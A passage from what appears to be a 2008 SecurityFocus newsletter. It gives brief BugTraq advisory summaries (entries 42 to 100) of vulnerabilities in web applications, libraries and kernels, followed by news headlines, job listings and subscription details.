Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

42. HP FTP Unspecified Remote Denial of Service Vulnerability
BugTraq ID: 29160
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29160
Summary:
FTP running on HP-UX is prone to a remote denial-of-service vulnerability.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.

43. Claroline Multiple Remote File Include Vulnerabilities
BugTraq ID: 29162
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29162
Summary:
Claroline is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow a remote attacker to compromise the application and the underlying system; other attacks are also possible.

Claroline 1.7.5 is affected; other versions may also be vulnerable.

44. Cisco User-Changeable Password (UCP) 'CSuserCGI.exe' Multiple Remote Vulnerabilities
BugTraq ID: 28222
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/28222
Summary:
Cisco User-Changeable Password (UCP) is prone to multiple remote vulnerabilities, including cross-site scripting and buffer-overflow vulnerabilities.

Exploiting the cross-site scripting issues may help the attacker steal cookie-based authentication credentials and launch other attacks. Exploiting the buffer-overflow vulnerabilities allows attackers to execute code in the context of the affected application, facilitating the remote compromise of affected computers.

The buffer-overflow issues are tracked by Cisco Bug ID CSCsl49180. The cross-site scripting issues are tracked by Cisco Bug ID CSCsl49205.

These issues affect versions prior to UCP 4.2 when running on Microsoft Windows.

45. BIGACE 'GLOBALS[_BIGACE][DIR]' Parameter Multiple Remote File Include Vulnerabilities
BugTraq ID: 29157
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29157
Summary:
BIGACE is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include arbitrary remote PHP code and execute it in the context of the webserver process.

A successful exploit may lead to a compromise of the underlying system; other attacks are also possible.

BIGACE 2.4 is vulnerable; other versions may also be affected.

46. IBD Micro CMS 'microcms-admin-login.php' Multiple SQL Injection Vulnerabilities
BugTraq ID: 29159
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29159
Summary:
IBD Micro CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Micro CMS 3.5 is vulnerable; other versions may also be affected.

47. ClanLite SQL Injection and Cross-Site Scripting Vulnerabilities
BugTraq ID: 29156
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29156
Summary:
ClanLite is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ClanLite 2.0 is vulnerable; other versions may also be affected.

48. AJ Dating 'view_profile.php' SQL Injection Vulnerability
BugTraq ID: 29154
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29154
Summary:
AJ Dating is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

49. OpenSSL Montgomery Exponentiation Side-Channel Local Information Disclosure Vulnerability
BugTraq ID: 25163
Remote: No
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/25163
Summary:
OpenSSL is prone to a local information-disclosure vulnerability because of an implementation flaw in the RSA algorithm.

Successfully exploiting this issue allows local attackers to gain access to private key information of other processes that use the affected library. Information harvested may aid in further attacks.

OpenSSL 0.9.8 is vulnerable to this issue; other versions may also be affected.

50. OpenSSL DTLS Heap Buffer Overflow Vulnerability
BugTraq ID: 26055
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/26055
Summary:
OpenSSL is prone to a heap buffer-overflow vulnerability because the library fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting this issue may allow attackers to execute arbitrary machine code in the context of applications that use the affected library, but this has not been confirmed. Failed exploit attempts may crash applications, denying service to legitimate users.

51. CyrixMED 'index.php' Cross Site Scripting Vulnerability
BugTraq ID: 29153
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29153
Summary:
CyrixMED is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

CyrixMED 1.4 is vulnerable; other versions may also be affected.

52. Linux Kernel 'fcntl_setlk()' SMP Ordering Local Denial of Service Vulnerability
BugTraq ID: 29076
Remote: No
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29076
Summary:
The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to trigger kernel crashes, denying service to legitimate users.

Versions prior to Linux kernel 2.6.25.2 and 2.4.36.4 are vulnerable.

53. T1lib intT1_Env_GetCompletePath Buffer Overflow Vulnerability
BugTraq ID: 25079
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/25079
Summary:
T1lib is prone to a buffer-overflow vulnerability because the library fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers.

An attacker can exploit this issue to execute arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts will likely trigger crashes, denying service to legitimate users.

We do not know which versions of T1lib are affected.

54. teTeX Mkind.C Remote Buffer Overflow Vulnerability
BugTraq ID: 23872
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/23872
Summary:
teTeX is prone to a buffer-overflow vulnerability because it fails to sufficiently perform boundary checks on user-supplied input before copying it to an insufficiently sized memory buffer.

Remote attackers may exploit this issue by enticing victims into opening a malicious file using the affected application.

Attackers can exploit this issue to execute arbitrary code with the privileges of an unsuspecting user. A successful attack can facilitate the compromise of vulnerable computers. Failed exploit attempts will likely result in denial-of-service conditions.

This issue affects teTeX 2.0.2 and 3.0.0; other versions may also be vulnerable.

55. teTeX DVI File Parsing Multiple Vulnerabilities
BugTraq ID: 26469
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/26469
Summary:
teTeX is prone to multiple vulnerabilities that include buffer-overflow errors and race-condition issues.

Attackers can exploit these issues to execute arbitrary code in the context of the affected application, cause denial-of-service conditions, or obtain potentially sensitive information.

56. GD Graphics Library Multiple Vulnerabilities
BugTraq ID: 24651
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/24651
Summary:
The GD graphics library is prone to multiple vulnerabilities.

An attacker can exploit this issue to cause denial-of-service conditions or execute arbitrary code in the context of applications implementing the affected library.

Version prior to GD graphics library 2.0.35 are reported vulnerable.

57. Xpdf Multiple Remote Stream.CC Vulnerabilities
BugTraq ID: 26367
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/26367
Summary:
Xpdf is prone to multiple remote vulnerabilities because of flaws in various functions in the 'Stream.cc' source file.

Attackers exploit these issues by coercing users to view specially crafted PDF files with the affected application.

Successfully exploiting these issues allows attackers to execute arbitrary machine code in the context of the vulnerable application. This facilitates the remote compromise of affected computers.

Xpdf 3.02pl1 is vulnerable to these issues; other versions may also be affected.

58. KDE KPDF/KWord/XPDF StreamPredictor Function Stack Buffer Overflow Vulnerability
BugTraq ID: 25124
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/25124
Summary:
KDE kpdf, kword, and xpdf are prone to a stack-based buffer-overflow vulnerability because the applications fail to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application or cause the affected application to crash, denying service to legitimate users.

59. GD Graphics Library PNG File Processing Denial of Service Vulnerability
BugTraq ID: 24089
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/24089
Summary:
The GD graphics library is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to cause denial-of-service conditions in applications implementing the affected library.

GD graphics library 2.0.34 is reported vulnerable; other versions may be affected as well.

60. PCRE Regular Expression Library UTF-8 Options Multiple Remote Denial of Service Vulnerabilities
BugTraq ID: 26550
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/26550
Summary:
PCRE regular-expression library is prone to multiple remote denial-of-service vulnerabilities because a memory-calculation error occurs for certain regular expressions.

Successful exploits may allow remote attackers to cause denial-of-service conditions on computers running the affected library.

These issues affect versions prior to PCRE 7.0.

61. Meto Forum 'forum/kategori.asp' SQL Injection Vulnerability
BugTraq ID: 29189
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29189
Summary:
Meto Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Meto Forum 1.1 is vulnerable; other versions may also be affected.

62. WGCC Web Group Communication Center Cross-Site Scripting and SQL Injection Vulnerabilities
BugTraq ID: 29188
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29188
Summary:
WGCC (Web Group Communication Center) is prone to multiple input-validation vulnerabilities, including a cross-site scripting issue and multiple SQL-injection issues, because it fails to sufficiently sanitize user-supplied data.

WGCC 1.0.3 is vulnerable; other versions may also be affected.

63. Build A Niche Store 'q' Parameter Cross-Site Scripting Vulnerability
BugTraq ID: 29187
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29187
Summary:
Build A Niche Store is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Build A Niche Store version 3.0 is vulnerable to this issue; other versions may also be affected.

64. Xen Para-Virtualized Framebuffer Message Format Denial Of Service Vulnerability
BugTraq ID: 29186
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29186
Summary:
Xen is prone to a denial-of-service vulnerability because the application fails to adequately verify the format of user-supplied data.

An attacker can leverage this issue to cause denial-of-service conditions, or compromise the privileged domain (dom0).

65. Zogo-shop 'products.php' SQL Injection Vulnerability
BugTraq ID: 29185
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29185
Summary:
Zogo-shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Zogo-shop 1.16 Beta 13 is vulnerable; other versions may also be affected.

66. EQdkp 'user_id' Parameter SQL Injection Vulnerability
BugTraq ID: 29184
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29184
Summary:
EQdkp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

EQdkp 1.3.2f is vulnerable; other versions may also be affected.

67. Xen Para Virtualized Frame Buffer Backend Local Denial of Service Vulnerability
BugTraq ID: 29183
Remote: No
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29183
Summary:
Xen is prone to a local denial of service vulnerability

Successfully exploiting this issue will crash the affected application, denying service to legitimate users. Due to the nature of this issue arbitrary code-execution may be possible, however this has not been confirmed.

68. TYPO3 WT Gallery Extension Multiple Input Validation Vulnerabilities
BugTraq ID: 29182
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29182
Summary:
The WT Gallery extension for TYPO3 is prone to a cross-site scripting vulnerability and multiple information-disclosure vulnerabilities because it fails to properly verify user-supplied input.

An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

WT Gallery (wt_gallery) 2.6.2 and prior are affected by the cross-site scripting issue. WT Gallery (wt_gallery) 2.5.0 and prior are affected by the information-disclosure issues.

69. e107 BLOG Engine 'comment.php' SQL Injection Vulnerability
BugTraq ID: 29181
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29181
Summary:
e107 BLOG Engine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

e107 BLOG Engine 2.2 is vulnerable; other versions may also be affected.

70. TYPO3 Event Database Extension Unspecified Cross Site Scripting Vulnerability
BugTraq ID: 29180
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29180
Summary:
The Event Database extension for TYPO3 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

Event Database (rlmp_eventdb) versions prior to 1.1.2 are vulnerable.

71. ActualScripts ActualAnalyzer 'view.php' Cross-Site Scripting Vulnerability
BugTraq ID: 29177
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29177
Summary:
ActualAnalyzer is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

Reports indicate that the following versions are affected:

ActualAnalyzer Server 8.37
ActualAnalyzer Gold 7.74
ActualAnalyzer Pro 6.95
ActualAnalyzer Lite 2.78

72. PCRE Regular Expression Library Multiple Integer and Buffer Overflow Vulnerabilities
BugTraq ID: 26462
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/26462
Summary:
PCRE regular-expression library is prone to multiple integer- and buffer-overflow vulnerabilities.

Attackers can exploit these issues to execute arbitrary code, cause denial-of-service conditions, or launch other attacks in the context of the application using the affected library.

73. PCRE Regular Expression Library Multiple Security Vulnerabilities
BugTraq ID: 26346
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/26346
Summary:
PCRE regular-expression library is prone to multiple security vulnerabilities.

Attackers can exploit these issues to execute arbitrary code, cause denial-of-service conditions, or launch other attacks in the context of the application using the affected library.

74. Apache HTTP Server 403 Error Cross-Site Scripting Vulnerability
BugTraq ID: 29112
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29112
Summary:
Apache HTTP server is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.

UPDATE: Additional reports indicate that the default error page has the Content-Type set, rendering it not vulnerable.

NOTE: Reportedly, Microsoft Internet Explorer fails to properly follow RFC-2616 and uses content-sniffing to interpret UTF-7 data received in HTTP responses. After further analysis, we may rewrite this BID to be Internet Explorer-specific.

75. ZeusCart 'category_list.php' SQL Injection Vulnerability
BugTraq ID: 29155
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29155
Summary:
ZeusCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ZeusCart 2.0 is vulnerable; other versions may also be affected.

76. phpInstantGallery Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 29152
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29152
Summary:
phpInstantGallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

77. Joomla! and Mambo xsstream-dm Component 'movie' Parameter SQL Injection Vulnerability
BugTraq ID: 29144
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29144
Summary:
The xsstream-dm component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

This issue affects xsstream-dm 0.01 Beta.

78. AJ Classifieds 'index.php' SQL Injection Vulnerability
BugTraq ID: 29151
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29151
Summary:
AJ Classifieds is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The issue affects AJ Classifieds 2008; other versions may also be vulnerable.

79. AJ Auction 'classifide_ad.php' SQL Injection Vulnerability
BugTraq ID: 29150
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29150
Summary:
AJ Auction is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The issue affects AJ Auction 6.2.1 and prior versions.

80. AJ Article 'featured_article.php' SQL Injection Vulnerability
BugTraq ID: 29149
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29149
Summary:
AJ Article is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The issue affects AJ Article 1.0; other versions may also be vulnerable.

81. Blender 'radiance_hdr.c' Remote Buffer Overflow Vulnerability
BugTraq ID: 28870
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28870
Summary:
Blender is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

The issue affects Blender 2.45; other versions may also be affected.

82. Blender Unspecified Insecure Temporary File Creation Vulnerability
BugTraq ID: 28936
Remote: No
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28936
Summary:
Blender creates temporary files in an insecure manner.

An attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application.

Successfully mounting a symlink attack may allow the attacker to delete or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.

83. WordPress WP Photo Album Plugin 'photo' Parameter SQL Injection Vulnerability
BugTraq ID: 29148
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29148
Summary:
The WordPress WP Photo Album (WPPA) plugin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

84. Vortex CMS 'index.php' SQL Injection Vulnerability
BugTraq ID: 29146
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29146
Summary:
Vortex CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

85. QuickUpCMS Multiple SQL Injection Vulnerabilities
BugTraq ID: 29145
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29145
Summary:
QuickUpCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

86. PhpBlock Multiple Remote File Include Vulnerabilities
BugTraq ID: 29143
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29143
Summary:
PhpBlock is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow a remote attacker to compromise the application and the underlying system; other attacks are also possible.

PhpBlock a8.5 is affected; other versions may also be vulnerable.

87. OtherLogic 'vocourse.php' SQL Injection Vulnerability
BugTraq ID: 29139
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29139
Summary:
OtherLogic is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

88. Advanced Links Management 'read.php' SQL Injection Vulnerability
BugTraq ID: 29137
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29137
Summary:
Advanced Links Management is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Advanced Links Management 1.5.2 is vulnerable; other versions may also be affected.

89. SARG Multiple Unspecified Buffer Overflow Vulnerabilities
BugTraq ID: 29141
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29141
Summary:
SARG is prone to multiple buffer-overflow vulnerabilities.

A remote attacker can exploit these issues to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in denial-of-service conditions.

90. Joomla! and Mambo Datsogallery Component 'sub_votepic.php' SQL Injection Vulnerability
BugTraq ID: 29138
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29138
Summary:
The Datsogallery component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Datsogallery 1.6 is vulnerable; other versions may also be affected.

91. Linux Kernel 'sys_utimensat' Local Denial of Service Vulnerability
BugTraq ID: 29134
Remote: No
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29134
Summary:
The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users.

This issue affects kernel versions 2.6.22 through to 2.6.25.2.

92. BlogPHP Multiple HTML Injection, Cross-Site Scripting and Cookie Manipulation Vulnerabilities
BugTraq ID: 29133
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29133
Summary:
BlogPHP is prone to multiple input-validation vulnerabilities, including a cross-site scripting issue, an HTML-injection issue, and a cookie-manipulation issue.

Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, and gain access as an arbitrary user.

BlogPHP 2.0 is vulnerable; other versions may also be affected.

93. Phoenix View CMS 'admin_frame.php' Cross-Site Scripting Vulnerability
BugTraq ID: 29130
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29130
Summary:
Phoenix View CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

Phoenix View CMS Pre Alpha2 is vulnerable; other versions may also be affected.

94. Ktools PhotoStore Multiple SQL Injection Vulnerabilities
BugTraq ID: 29136
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29136
Summary:
PhotoStore is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

95. Ktools PhotoStore 'gallery.php' SQL Injection Vulnerability
BugTraq ID: 29132
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29132
Summary:
PhotoStore is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PhotoStore 3.4.3 is vulnerable; other versions may also be affected.

96. txtCMS 'index.php' Local File Include Vulnerability
BugTraq ID: 29131
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29131
Summary:
txtCMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.

txtCMS 0.3 is vulnerable; other versions may also be affected.

97. Admidio 'get_file.php' Local File Include Vulnerability
BugTraq ID: 29127
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29127
Summary:
Admidio is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.

Admidio 1.4.8 is vulnerable; other versions may also be affected.

98. Red Hat Directory Server LDAP Query Patterns Buffer Overflow Vulnerability
BugTraq ID: 29126
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29126
Summary:
Red Hat Directory Server is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data when processing LDAP queries.

Attackers could exploit this issues to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.

99. ZoneMinder Multiple Unspecified Remote Code Execution Vulnerabilities
BugTraq ID: 28968
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28968
Summary:
ZoneMinder is prone to multiple unspecified remote code-execution vulnerabilities.

Successful exploits allow remote, authenticated attackers to execute arbitrary script code with the privileges of the webserver user. This may facilitate the remote compromise of the underlying operating system.

Versions prior to ZoneMinder 1.23.3 are vulnerable.

100. SIPp 'call.cpp' Remote Buffer Overflow Vulnerability
BugTraq ID: 28884
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28884
Summary:
SIPp is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

The issue affects SIPp 3.0; other versions may also be affected.

III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Groups warn travelers to limit laptop data
By: Robert Lemos
In a letter to Congress, nearly three dozen organizations protest the seizures of electronic devices by U.S. customs officials, an act upheld by a federal appeals court in a recent ruling.
http://www.securityfocus.com/news/11516

2. Patches pose significant risk, researchers say
By: Robert Lemos
A group of four computer scientists say Windows Update -- and other patch services -- should be redesigned, after they create a technique to quickly produce attack code from a distributed patch.
http://www.securityfocus.com/news/11514

3. U.S. gov't pushes cybersecurity at con
By: Robert Lemos
Top Bush Administration officials descend on the RSA Security Conference laying out their plans for protecting critical networks and giving a small taste of the latest national cyber exercise, Cyber Storm II.
http://www.securityfocus.com/news/11513

4. Web developers, fix thy Flash
By: Robert Lemos
Flaws that allow cross-site scripting attacks through Adobe Flash files could let attackers compromise online accounts and local networks. Yet, Web publishers have been slow to fix their sites, a security researcher says.
http://www.securityfocus.com/news/11511

IV. SECURITY JOBS LIST SUMMARY
-------------------------------
1. [SJ-JOB] Quality Assurance, Alpharetta
http://www.securityfocus.com/archive/77/492026

2. [SJ-JOB] Security Researcher, Centreville, VA
http://www.securityfocus.com/archive/77/492037

3. [SJ-JOB] Forensics Engineer, Arlington
http://www.securityfocus.com/archive/77/492038

4. [SJ-JOB] Sr. Product Manager, San Jose
http://www.securityfocus.com/archive/77/492023

5. [SJ-JOB] Application Security Engineer, New York
http://www.securityfocus.com/archive/77/492024

6. [SJ-JOB] Security Auditor, South Portland
http://www.securityfocus.com/archive/77/492025

7. [SJ-JOB] Application Security Engineer, Philadelphia
http://www.securityfocus.com/archive/77/492036

8. [SJ-JOB] Sales Representative, San Jose
http://www.securityfocus.com/archive/77/492039

9. [SJ-JOB] Security Architect, South Portland
http://www.securityfocus.com/archive/77/492022

10. [SJ-JOB] Security Consultant, Mission Viejo
http://www.securityfocus.com/archive/77/491781

11. [SJ-JOB] Security Consultant, Dallas
http://www.securityfocus.com/archive/77/491782

12. [SJ-JOB] Security Consultant, Chicago
http://www.securityfocus.com/archive/77/491784

13. [SJ-JOB] Security Consultant, Various
http://www.securityfocus.com/archive/77/491785

14. [SJ-JOB] Forensics Engineer, Mission Viejo
http://www.securityfocus.com/archive/77/491780

15. [SJ-JOB] Security Consultant, Calgary
http://www.securityfocus.com/archive/77/491783

V. INCIDENTS LIST SUMMARY
---------------------------
1. Distributed Bruteforce against SSH
http://www.securityfocus.com/archive/75/491953

2. Possible Zombie/Bot?
http://www.securityfocus.com/archive/75/491947

3. Malware IRC/DNS Network Activity
http://www.securityfocus.com/archive/75/491834

4. Weird SSH attack last night and this morning (still ongoing)
http://www.securityfocus.com/archive/75/491739

VI. VULN-DEV RESEARCH LIST SUMMARY
-----------------------------------
VII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. XP Hardening
http://www.securityfocus.com/archive/88/492001

2. SecurityFocus Microsoft Newsletter #393
http://www.securityfocus.com/archive/88/491763

3. Binding Windows Services to Specific Addresses Only
http://www.securityfocus.com/archive/88/491595

VIII. SUN FOCUS LIST SUMMARY
----------------------------
IX. LINUX FOCUS LIST SUMMARY
----------------------------
X. UNSUBSCRIBE INSTRUCTIONS
-----------------------------
To unsubscribe send an e-mail message to sf-news-unsubscribe@securityfocus.com from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message to which you will have to answer. Alternatively you can also visit http://www.securityfocus.com/newsletters and unsubscribe via the website.

If your email address has changed email listadmin@securityfocus.com and ask to be manually removed.

XI. SPONSOR INFORMATION
------------------------
This issue is sponsored by Solidcore Systems Inc.

PCI DSS Compliance for $50/Node
